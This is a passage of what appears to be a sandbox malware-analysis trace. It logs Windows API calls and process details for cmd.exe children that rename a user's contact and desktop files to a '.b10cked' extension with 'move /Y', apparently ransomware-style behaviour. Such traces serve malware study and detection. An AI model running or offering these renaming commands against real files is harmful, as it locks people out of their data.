(_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2=".") returned 71 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2="..") returned 71 [0220.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl~1.con")) returned 0x20 [0220.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.076] SetErrorMode (uMode=0x0) returned 0x0 [0220.076] SetErrorMode (uMode=0x1) returned 0x0 [0220.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", nBufferLength=0x104, lpBuffer=0x12ed34, lpFilePart=0x12ed1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", lpFilePart=0x12ed1c*="UOSJFL~1.CON") returned 0x26 [0220.076] SetErrorMode (uMode=0x0) returned 0x1 [0220.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2=".") returned 71 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2="..") returned 71 [0220.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl~1.con")) returned 0x20 [0220.076] SetErrorMode (uMode=0x0) returned 0x0 [0220.077] SetErrorMode (uMode=0x1) returned 0x0 [0220.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", nBufferLength=0x104, lpBuffer=0x12f1b0, lpFilePart=0x12ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", lpFilePart=0x12ef48*="UOSJFL~1.CON") returned 0x26 [0220.077] SetErrorMode (uMode=0x0) returned 0x1 [0220.077] SetErrorMode (uMode=0x0) returned 0x0 [0220.077] SetErrorMode (uMode=0x1) returned 0x0 [0220.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12f3b8, lpFilePart=0x12ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", lpFilePart=0x12ef48*="uosjfl sidvllie.contact.b10cked") returned 0x39 [0220.077] SetErrorMode (uMode=0x0) returned 0x1 [0220.077] SetLastError (dwErrCode=0x0) [0220.077] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.b10cked")) returned 0xffffffff [0220.077] GetLastError () returned 0x2 [0220.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", fInfoLevelId=0x1, lpFindFileData=0x12e8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8c4) returned 0x310e70 [0220.077] FindNextFileW (in: hFindFile=0x310e70, lpFindFileData=0x12e8c4 | out: lpFindFileData=0x12e8c4) returned 0 [0220.078] GetLastError () returned 0x12 [0220.078] FindClose (in: hFindFile=0x310e70 | out: hFindFile=0x310e70) returned 1 [0220.078] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", fInfoLevelId=0x1, lpFindFileData=0x321be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321be0) returned 0x310e70 [0220.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked", lpFilePart=0x0) returned 0x39 [0220.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x104, lpBuffer=0x12eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0220.079] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact")) returned 0x20 [0220.079] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.b10cked"), dwFlags=0x3) returned 1 [0220.079] FindClose (in: hFindFile=0x310e70 | out: hFindFile=0x310e70) returned 1 [0220.079] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb10 | out: _Buffer=" 1") returned 9 [0220.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.079] GetFileType (hFile=0x7) returned 0x2 [0220.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ea9c | out: lpMode=0x12ea9c) returned 1 [0220.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12ead0 | out: lpConsoleScreenBufferInfo=0x12ead0) returned 1 [0220.086] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.087] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x12eb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.087] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eaf4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x12eaf4*=0x1a) returned 1 [0220.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.087] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.087] SetConsoleInputExeNameW () returned 0x1 [0220.087] GetConsoleOutputCP () returned 0x1b5 [0220.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.088] exit (_Code=0) Process: id = "570" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xc78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32816 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32817 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32818 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32819 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 32820 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32821 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32822 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32823 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32824 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32825 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33032 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33033 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33034 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33035 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33036 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 33037 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33038 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33039 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33040 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33041 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33042 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33043 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33044 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33045 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33060 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 33061 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33062 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33063 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 33064 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33065 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33066 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 33067 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 33068 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 33069 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 774 os_tid = 0xd30 [0220.163] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fadc | out: lpSystemTimeAsFileTime=0x12fadc*(dwLowDateTime=0xb8076ca0, dwHighDateTime=0x1d440a9)) [0220.163] GetCurrentProcessId () returned 0xc78 [0220.163] GetCurrentThreadId () returned 0xd30 [0220.163] GetTickCount () returned 0x3d74b [0220.163] QueryPerformanceCounter (in: lpPerformanceCount=0x12fad4 | out: lpPerformanceCount=0x12fad4*=27695271882) returned 1 [0220.164] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.164] __set_app_type (_Type=0x1) [0220.164] __p__fmode () returned 0x76b331f4 [0220.164] __p__commode () returned 0x76b331fc [0220.164] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.165] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.165] GetCurrentThreadId () returned 0xd30 [0220.165] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd30) returned 0x38 [0220.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.165] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.165] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.174] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa6c | out: phkResult=0x12fa6c*=0x0) returned 0x2 [0220.174] VirtualQuery (in: lpAddress=0x12faa3, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.174] GetConsoleOutputCP () returned 0x1b5 [0220.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.175] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.178] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.178] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.183] GetEnvironmentStringsW () returned 0x2b0168* [0220.183] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0220.184] GetEnvironmentStringsW () returned 0x2b0168* [0220.184] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0220.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x90, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegCloseKey (hKey=0x40) returned 0x0 [0220.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0220.184] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0220.185] RegCloseKey (hKey=0x40) returned 0x0 [0220.185] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.185] srand (_Seed=0x5b8863b6) [0220.185] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"" [0220.185] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"" [0220.185] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.185] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.185] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.185] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.186] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.186] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.186] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.186] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.186] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.186] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.186] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.186] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.186] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.186] GetEnvironmentStringsW () returned 0x2b22b8* [0220.186] FreeEnvironmentStringsW (penv=0x2b22b8) returned 1 [0220.186] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.186] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.186] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.186] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.186] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.186] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.186] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.187] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.187] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.187] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.187] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.187] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7a8, lpFilePart=0x12f7a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7a4*="Desktop") returned 0x18 [0220.187] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.187] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x2afff8 [0220.187] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0220.187] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x2afff8 [0220.187] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0220.188] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x2afff8 [0220.188] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0220.188] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.188] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.188] SetEnvironmentVariableW (lpName="=C:", 